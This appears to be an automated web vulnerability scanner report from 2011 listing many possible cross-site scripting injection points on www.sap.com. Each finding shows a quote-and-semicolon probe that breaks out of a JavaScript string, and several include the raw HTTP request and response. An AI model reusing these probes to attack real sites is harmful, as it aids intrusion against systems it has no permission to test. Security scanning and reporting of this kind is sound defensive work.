The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8e2'%3b344ff4a6aa was submitted in the REST URL parameter 1. This input was echoed as be8e2';344ff4a6aa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalbe8e2'%3b344ff4a6aa/js/rm_js/rm_browser.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34205 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:42 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:42 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalbe8e2';344ff4a6aa'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df80d'%3b2cc172492f6 was submitted in the REST URL parameter 1. This input was echoed as df80d';2cc172492f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globaldf80d'%3b2cc172492f6/js/rm_js/rm_dhtml.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34198 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:41 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:41 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globaldf80d';2cc172492f6'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a719'%3b0d2f51e5aad was submitted in the REST URL parameter 1. This input was echoed as 4a719';0d2f51e5aad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global4a719'%3b0d2f51e5aad/js/rm_js/rm_iframe.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34205 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:43 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:43 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global4a719';0d2f51e5aad'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e6d5'%3b90fcd6ea8d3 was submitted in the REST URL parameter 1. This input was echoed as 5e6d5';90fcd6ea8d3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global5e6d5'%3b90fcd6ea8d3/js/roiengine.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34151 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:55 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:55 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global5e6d5';90fcd6ea8d3'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7aaf'%3bbad30282377 was submitted in the REST URL parameter 1. This input was echoed as b7aaf';bad30282377 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalb7aaf'%3bbad30282377/js/sap_flash_js.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34188 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:54 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:54 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalb7aaf';bad30282377'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc39'%3bd5d71600491 was submitted in the REST URL parameter 1. This input was echoed as fbc39';d5d71600491 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /globalfbc39'%3bd5d71600491/js/search.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34130 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:44 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:44 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='globalfbc39';d5d71600491'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a0c'%3b4bbc571b8b1 was submitted in the REST URL parameter 1. This input was echoed as 81a0c';4bbc571b8b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global81a0c'%3b4bbc571b8b1/js/workspace.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34151 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:49 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:49 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global81a0c';4bbc571b8b1'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87339'%3bd20b3e6e719 was submitted in the REST URL parameter 1. This input was echoed as 87339';d20b3e6e719 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb27d'%3b9f0814850ad was submitted in the REST URL parameter 1. This input was echoed as bb27d';9f0814850ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43183'%3b2484e654024 was submitted in the REST URL parameter 1. This input was echoed as 43183';2484e654024 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07cd'%3bec4edde2e02 was submitted in the REST URL parameter 1. This input was echoed as b07cd';ec4edde2e02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b671c'%3b543226d3f77 was submitted in the REST URL parameter 1. This input was echoed as b671c';543226d3f77 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c407'%3ba024c6ca314 was submitted in the REST URL parameter 1. This input was echoed as 9c407';a024c6ca314 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9aed'%3baf99673ff4a was submitted in the REST URL parameter 1. This input was echoed as a9aed';af99673ff4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e93a'%3bcbcf73c2e51 was submitted in the REST URL parameter 1. This input was echoed as 2e93a';cbcf73c2e51 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3df'%3b7dc9d8a7f02 was submitted in the REST URL parameter 1. This input was echoed as 6a3df';7dc9d8a7f02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d6ae'%3bca47a3e20cd was submitted in the REST URL parameter 1. This input was echoed as 7d6ae';ca47a3e20cd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8c79'%3b413038ff152 was submitted in the REST URL parameter 1. This input was echoed as c8c79';413038ff152 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673b1'%3b54f56dbaa52 was submitted in the REST URL parameter 1. This input was echoed as 673b1';54f56dbaa52 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a05b7'%3b45b4788a8c7 was submitted in the REST URL parameter 1. This input was echoed as a05b7';45b4788a8c7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a27'%3b9799824c8c5 was submitted in the REST URL parameter 1. This input was echoed as a1a27';9799824c8c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36482'%3b07344e13425 was submitted in the REST URL parameter 1. This input was echoed as 36482';07344e13425 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c2e'%3b24783e50e3c was submitted in the REST URL parameter 1. This input was echoed as 56c2e';24783e50e3c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global56c2e'%3b24783e50e3c/ui/js/samlscript.js HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34194 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:35 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:35 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:02:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global56c2e';24783e50e3c'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4a85'%3bc5184766698 was submitted in the REST URL parameter 1. This input was echoed as e4a85';c5184766698 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 183b0'%3b403f5d13ed4 was submitted in the REST URL parameter 1. This input was echoed as 183b0';403f5d13ed4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbae5'%3b6927fdc0b2c was submitted in the REST URL parameter 1. This input was echoed as dbae5';6927fdc0b2c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f84b'%3b8f94007213d was submitted in the REST URL parameter 1. This input was echoed as 2f84b';8f94007213d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1088e'%3bc4287d6548d was submitted in the REST URL parameter 1. This input was echoed as 1088e';c4287d6548d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d56'%3b550ae090394 was submitted in the REST URL parameter 1. This input was echoed as b5d56';550ae090394 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d960e'%3bdf9b76a1320 was submitted in the REST URL parameter 1. This input was echoed as d960e';df9b76a1320 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aa40'%3b4c4ad194a39 was submitted in the REST URL parameter 1. This input was echoed as 9aa40';4c4ad194a39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11690'%3bb040f2da0c1 was submitted in the REST URL parameter 1. This input was echoed as 11690';b040f2da0c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4781'%3b89984ca68ca was submitted in the REST URL parameter 1. This input was echoed as a4781';89984ca68ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba74a'%3b879ffb992f was submitted in the REST URL parameter 1. This input was echoed as ba74a';879ffb992f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70a4b'%3b08e671c02b9 was submitted in the REST URL parameter 1. This input was echoed as 70a4b';08e671c02b9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
